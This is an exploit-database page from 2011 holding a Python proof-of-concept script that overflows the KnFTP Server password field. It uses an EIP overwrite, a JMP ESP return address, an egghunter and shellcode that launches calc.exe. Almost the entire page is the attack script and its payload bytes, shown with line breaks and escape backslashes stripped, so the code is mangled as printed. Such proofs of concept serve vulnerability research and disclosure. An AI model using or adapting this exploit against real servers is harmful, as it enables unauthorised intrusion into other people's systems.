Home / exploits KnFTP Server Buffer Overflow
Posted on 12 September 2011
#!/usr/bin/python # tested on windows xp sp3 # overwrites EIP # seh is overwritten with larger payloads # knftpd.exe is the only non safeseh module import sys,socket print " =====================" print "KnFTP Buffer Overflow" print " Written by Blake " print "===================== " if len(sys.argv) !=3: print "[*] Usage: %s <ip> <port>" % sys.argv[0] sys.exit(0) target = sys.argv[1] port = int(sys.argv[2]) # 271 bytes of space for shellcode # 227 bytes windows/exec CMD => calc.exe shellcode =( "xb8xe8xaax5exc0xdbxd6xd9x74x24xf4x5bx31xc9xb1" "x33x31x43x12x03x43x12x83x03x56xbcx35x2fx4fxc8" "xb6xcfx90xabx3fx2axa1xf9x24x3fx90xcdx2fx6dx19" "xa5x62x85xaaxcbxaaxaax1bx61x8dx85x9cx47x11x49" "x5exc9xedx93xb3x29xcfx5cxc6x28x08x80x29x78xc1" "xcfx98x6dx66x8dx20x8fxa8x9ax19xf7xcdx5cxedx4d" "xcfx8cx5exd9x87x34xd4x85x37x45x39xd6x04x0cx36" "x2dxfex8fx9ex7fxffxbexdex2cx3ex0fxd3x2dx06xb7" "x0cx58x7cxc4xb1x5bx47xb7x6dxe9x5ax1fxe5x49xbf" "x9ex2ax0fx34xacx87x5bx12xb0x16x8fx28xccx93x2e" "xffx45xe7x14xdbx0exb3x35x7axeax12x49x9cx52xca" "xefxd6x70x1fx89xb4x1exdex1bxc3x67xe0x23xccxc7" "x89x12x47x88xcexaax82xedx21xe1x8fx47xaaxacx45" "xdaxb7x4exb0x18xcexccx31xe0x35xccx33xe5x72x4a" "xafx97xebx3fxcfx04x0bx6axacxcbx9fxf6x1dx6ex18" "x9cx61") # 32 byte egghunter egghunter =( "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8" "x54x30x30x57" # egg - W00T "x8bxfaxafx75xeaxafx75xe7xffxe7") egg = "x54x30x30x57x54x30x30x57" buffer = "x90" * (271 - len(egg + shellcode)) eip = "x13x44x87x7c" # 7C874413 JMP ESP - kernel32.dll nops = "x90" * 8 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "[+] Connecting to %s on port %d" % (target,port) try: s.connect((target,port)) print "[+] Sending payload" s.send("USER blake ") s.recv(1024) s.send("PASS " + buffer + egg + shellcode + eip + nops + egghunter + " ") s.recv(1024) s.close() print "[+] Payload sent successfully" raw_input("[+] Press any key to exit ") except: print "[+] Could not connect to %s!" % target sys.exit(0)
